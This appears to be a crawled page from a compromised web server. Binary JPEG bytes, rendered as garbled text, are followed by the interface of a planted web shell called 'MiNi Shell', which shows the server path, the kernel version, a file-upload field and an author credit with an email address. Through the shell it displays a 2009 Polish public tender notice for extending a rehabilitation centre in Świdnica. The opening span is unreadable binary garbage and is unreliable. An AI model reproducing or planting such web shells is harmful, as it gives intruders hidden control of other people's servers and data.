JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090904/305752-N-2009.html

<p class="kh_header"><b>Warszawa: Wykonanie robót  budowlanych w ramach zadania:

Rozbudowa parterowa budynku Ośrodka Rehabilitacyjno-edukacjno-wychowawczego, 
Świdnica ul. Kozara Słobódzkiego28(dz. Nr 12 4 obr.1)</b><br>
<b>Numer ogłoszenia: 305752 - 2009; data zamieszczenia: 04.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Główny Polskiego Stowarzyszenia na rzecz Osób z Upośledzeniem Umysłowym , ul. Głogowa 2b, 02-639 Warszawa, woj. mazowieckie, tel. 022 6460314, 8488260, faks 022 8486162.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót  budowlanych w ramach zadania:

Rozbudowa parterowa budynku Ośrodka Rehabilitacyjno-edukacjno-wychowawczego, 
Świdnica ul. Kozara Słobódzkiego28(dz. Nr 12 4 obr.1).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem przetargu jest wykonanie rozbudowy i częściowej przebudowy istniejącego budynku parterowego. Na działce przewidziano następujące nowe elementy zabudowy: poszerzony zostanie łącznik budynek o szer. 7,54 m, obsługa komunikacyjna bez zmian. Media z istniejących przyłączy na bazie instalacji wewnętrznych. Wody opadowe odprowadzone będą do kanalizacji deszczowej.
CHARAKTERYSTYKA ZAMÓWIENIA:
W dobudowywanej parterowej części obiektu przewidziano pomieszczenie administracyjne, pomieszczenie wózkowni,salę dydaktyczną oraz WC dla niepełnosprawnych. Sala dydaktyczna przewidziana jest nie więcej niż 4 osoby. Rozbudowa obejmuje dobudówkę o wysokości zgodnej z zabudową istniejącą. Całkowita powierzchnia rozbudowy obejmuje fragment obiektu istniejącego, który ulega rozebraniu oraz część nowo dobudowaną. Przyjęto  technologię tradycyjną, ściany murowane z elementów drobnowymiarowych, stropodach niewentylowany na stropie Teriva I. Przedmiot zamówienia szczegółowo został opisany w projekcie budowlanym autorstwa INTEGRA  Budownictwo i nieruchomości, Rynek 36, 58-200 Dzierżoniów, oraz  w specyfikacji technicznej wykonania i odbioru robót oraz SIWZ  Przedmiar(jako element pomocniczy) robót stanowią załącznik do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.00.00.00-7, 45.11.10.00-1, 45.11.10.00-1, 45.21.42.00-2, 45.41.00.00-4, 45.45.00.00-6, 45.32.10.00-3, 45.45.00.00-6, 45.44.00.00-3, 45.42.10.00-6, 45.31.12.00-2, 45.26.21.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 10.000,- zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawca składający ofertę musi spełniać warunki określone w art. 22 ust. 1  - Prawa Zamówień Publicznych w szczególności poprzez : 

a.nie podleganie wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 - Prawa 
    Zamówień Publicznych,
b. prowadzenie działalności tożsamej z niniejszym zamówieniem tj. w zakresie wykonywania robót budowlanych (PKD - dział 45),
c. dysponowanie osobami zdolnymi do wykonania zamówienia tj. dysponowanie kadrą techniczną posiadającą wymagane Prawem Budowlanym uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej,

d. posiadanie niezbędnej wiedzy i doświadczenia tj. zrealizowanie w ostatnich pięciu latach co najmniej dwóch zamówień o charakterze i złożoności porównywalnej z zakresem niniejszego zamówienia tj. wykonanie lub remont budynku mieszkalnego lub obiektu użyteczności publicznej o łącznej wartości dwóch robót netto nie mniejszej niż 500.000 zł, a jeśli okres prowadzonej działalności jest krótszy - w tym okresie,

e.znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. posiada środki lub zdolność kredytową na kwotę 200.000 zł jak również posiada przychód ze sprzedaży usług netto za ostatnie 3 lata nie mniejszy niż 1.000.000,- zł, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres,
f.posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej  na sumę ubezpieczenia nie mniejszą jak: 200.000,-zł.


Ocena spełniania warunków wymaganych od  Wykonawców zostanie dokonana według formuły 
SPEŁNIA - NIE SPEŁNIA.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> - dokumenty potwierdzające spełnienie warunków udziału w postępowaniu w zakresie posiadanych uprawnień do wykonywania określonej działalności lub czynności związanych z przedmiotem zamówienia oraz że nie podlega wykluczeniu na podstawie art.24 Prawa Zamówień Publicznych:

1. wymagane oświadczenia zgodnie ze wzorem oferty przetargowej załącznik nr 1 do SIWZ -załącznik nr 1
W przypadku złożenia oferty wspólnej, oświadczenia powinny być przedłożone w formie pisemnej osobno przez wszystkich Wykonawców składających tę ofertę lub przez pełnomocnika ustanowionego zgodnie z art. 23 ust. 2 Ustawy Prawo Zamówień Publicznych - pełnomocnictwo stanowi załącznik do oferty.
2. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; -załącznik nr 2
W przypadku gdy przedstawiony odpis z rejestru nie odzwierciedla stanu faktycznego i może wprowadzić  w błąd, co do poprawności złożenia oferty (uprawnienia do jej podpisywania) wymagane jest przedłożenie złożonego wniosku o wpis do odpowiedniego rejestru zawierającego dane o zmianie stanu np. reprezentacji. 
3. aktualną informację z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; - załącznik nr 3
4. aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; - załącznik nr 4
5. aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego, że wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu podatkowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert-załącznik nr 5
6. aktualne zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. - załącznik nr 6
W przypadku składania ofert przez Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt.7 ust. 2,4, 5 i  6 SIWZ składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:	
			1.	nie otwarto jego likwidacji ani nie ogłoszono upadłości;
			2.	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
			3.	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się ww. dokumentów oraz  dokumentu o którym mowa w pkt.7 ust. 3 SIWZ, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 
- dokumenty potwierdzające spełnienie warunków udziału w postępowaniu w zakresie posiadania niezbędnej wiedzy i doświadczenia oraz potencjału technicznego, a także że wykonawca dysponuje osobami zdolnymi do wykonania zamówienia: 

7. wykaz kadry technicznej i wykaz części zamówienia, których realizację Wykonawca zamierza powierzyć podwykonawcom, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności; wykonawca w przedmiotowym wykazie zobowiązany jest do wskazania osoby, która pełnić będzie funkcje kierownika budowy - załącznik nr 7 wg. wzoru załącznik nr 3 SIWZ
Zamawiający dopuszcza realizację zamówienia w systemie podwykonawczym, oraz w ramach oferty wspólnej. W związku z powyższym należy w powyższych przypadkach dołączyć dokumenty określone odpowiednio w pkt. 7 ust. 13 oraz pkt.7 ust. 14.

8. Dokumenty stwierdzające, że osoba przewidziana do pełnienia funkcji kierownika budowy posiada uprawnienia budowlane stosowne do powierzonej mu funkcji do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej;
tj. kserokopia uprawnień wraz z zaświadczeniem o przynależności do właściwej izby zawodowej oraz ubezpieczeniu od odpowiedzialności cywilnej, - załącznik nr 8,

   9.wykaz wykonanych w okresie ostatnich pięciu lat robót budowlanych, t.j. zrealizowanie w ostatnich pięciu latach co najmniej dwóch zamówień o charakterze i złożoności porównywalnej z zakresem niniejszego zamówienia tj. wykonanie lub remont budynku mieszkalnego lub obiektu użyteczności publicznej o łącznej wartości dwóch robót netto nie mniejszej niż 500.000 zł, a jeśli okres prowadzonej działalności jest krótszy - w tym okresie,, wraz z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (np. referencje, protokoły odbioru robót budowlanych); - załącznik nr 9 wg. wzoru załącznik nr 4 SIWZ

- dokumenty potwierdzające spełnienie warunków udziału w postępowaniu w zakresie sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
10. sprawozdanie finansowe. W ramach sprawozdania należy dołączyć bilans oraz rachunek zysków i strat,  a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o badanym sprawozdaniu albo w przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających przychody ze sprzedaży usług netto nie mniejszy niż 1.000.000,- zł, zysk oraz zobowiązania i należności łącznie - za okres ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres; - załącznik nr 10
11. informację banku, w którym wykonawca posiada rachunek bankowy, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę 200.000 zł, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; - załącznik nr 11
12. polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą jak: 200.000,-zł. - załącznik nr 12 


- inne wymagane, niezbędne dokumenty w toku oceny i badania ofert 

13. umowę regulującą współpracę podmiotów występujących wspólnie spółka cywilna, konsorcjum. 
W przypadku konsorcjum umowa winna m.in. wskazywać lidera konsorcjum oraz zapis o odpowiedzialności 
solidarnej uczestników konsorcjum wobec inwestora. Każdy z uczestników konsorcjum winien załączyć do oferty dokumenty wskazane w   pkt. 7 ust. 2,3,4,5,6. - załącznik nr 13

14. Umowy lub projekty umów podwykonawczych, Wykonawca dołączy do oferty celem akceptacji ich przez Zamawiającego zgodnie z art. 6471 kodeksu cywilnego  Dz.U. z dnia 14 lutego 2003 r. Nr 49 poz 408- załącznik nr 14
15. harmonogram rzeczowo -finansowy - załącznik nr 15 wg. wzoru załącznik nr 5 SIWZ
16. kosztorys ofertowy - załącznik nr 16
17. dowód wniesienia wadium - załącznik nr 17
18. Pełnomocnictwo do działania w imieniu Wykonawcy w przypadku, gdy nie jest to osoba upoważniona do reprezentowania Wykonawcy z mocy prawa, a w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, zgodnie z art. 23 ust. 2 Ustawy - załącznik nr 18

Wyżej wymienione dokumenty stanowią warunek przyjęcia oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.swidnica.bip-gov.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Polskie Stowarzyszenie na rzecz osób z upośledzeniem umysłowym Koło w Świdnicy, 
ul. K. Słobódzkiego 28, 58-100 Świdnica -sekretariat.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2009 godzina 11:00, miejsce: Polskie Stowarzyszenie na rzecz osób z upośledzeniem umysłowym Koło w Świdnicy, 
ul. K. Słobódzkiego 28, 58-100 Świdnica -sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com